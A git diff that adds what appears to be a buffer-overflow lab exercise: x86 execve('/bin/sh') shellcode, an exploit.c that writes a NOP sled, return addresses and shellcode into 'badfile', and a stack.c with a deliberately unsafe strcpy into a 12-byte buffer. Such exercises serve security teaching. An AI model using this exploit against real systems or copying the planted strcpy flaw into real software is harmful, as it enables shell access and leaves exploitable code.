diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000..691a8f6 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,3 @@ +{ + "C_Cpp.errorSquiggles": "Disabled" +} \ No newline at end of file diff --git a/buffer_overflow_example/demeter/call_shellcode.c b/buffer_overflow_example/demeter/call_shellcode.c new file mode 100644 index 0000000..00c8483 --- /dev/null +++ b/buffer_overflow_example/demeter/call_shellcode.c @@ -0,0 +1,27 @@ +/* call_shellcode.c */ + +/* This program will create a file containing code for launching a shell */ + +#include +#include + +const char code[] = + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68""//sh" /* pushl $0x68732f2f */ + "\x68""/bin" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x99" /* cdq */ + "\xb0\x0b" /* movb $0x0b,%al */ + "\xcd\x80" /* int $0x80 */ +; + +int main(int argc, char **argv) +{ + char buf[sizeof(code)]; + strcpy(buf, code); + ((void(*)( ))buf)( ); +} \ No newline at end of file diff --git a/buffer_overflow_example/demeter/exploit.c b/buffer_overflow_example/demeter/exploit.c new file mode 100644 index 0000000..6465cec --- /dev/null +++ b/buffer_overflow_example/demeter/exploit.c @@ -0,0 +1,69 @@ +//exploit.c +#include +#include +#include +#define DEFAULT_OFFSET 350 + +char code[]= +"\x31\xc0" +"\x50" +"\x68""//sh" +"\x68""/bin" +"\x89\xe3" +"\x50" +"\x53" +"\x89\xe1" +"\x99" +"\xb0\x0b" +"\xcd\x80" +; + +unsigned long get_sp(void) +{ + __asm__("movl %esp,%eax"); +} + +void main(int argc, char **argv) +{ +char buffer[517]; +FILE *badfile; +char *ptr; +long *a_ptr,ret; + +int offset = DEFAULT_OFFSET; +int codeSize = sizeof(code); +int buffSize = sizeof(buffer); + +if(argc > 1) offset = atoi(argv[1]); //this allows for command line input + +ptr=buffer; +a_ptr = (long *) ptr; + +/* Initialize buffer with 0x90 (NOP instruction) */ +memset(buffer, 0x90, buffSize); + +//----------------------BEGIN FILL BUFFER----------------------\\ + +ret = get_sp()+offset; + printf("Return Address: 0x%x\n",get_sp()); + printf("Address: 0x%x\n",ret); + +ptr = buffer; + a_ptr = (long *) ptr; + +int i; +for (i = 0; i < 300;i+=4) + *(a_ptr++) = ret; + +for(i = 486;i < codeSize + 486;++i) + buffer[i] = code[i-486]; + +buffer[buffSize - 1] = '\0'; +//-----------------------END FILL BUFFER-----------------------\\ + + +/* Save the contents to the file "badfile" */ +badfile = fopen("./badfile", "w"); +fwrite(buffer,517,1,badfile); +fclose(badfile); +} \ No newline at end of file diff --git a/buffer_overflow_example/demeter/stack.c b/buffer_overflow_example/demeter/stack.c new file mode 100644 index 0000000..6a954e3 --- /dev/null +++ b/buffer_overflow_example/demeter/stack.c @@ -0,0 +1,29 @@ +/* stack.c */ + +/* This is the program that introduces the buffer overflow vulnerability. */ +#include +#include +#include + +int bof(char *str) +{ + char buffer[12]; + + /* Can you spot the buffer overflow here? ;-) */ + strcpy(buffer, str); + + return 1; +} + +int main(int argc, char **argv) +{ + char str[517]; + FILE *badfile; + + badfile = fopen("badfile", "r"); + fread(str, sizeof(char), 517, badfile); + bof(str); + + printf("Returned Properly\n"); + return 1; +} \ No newline at end of file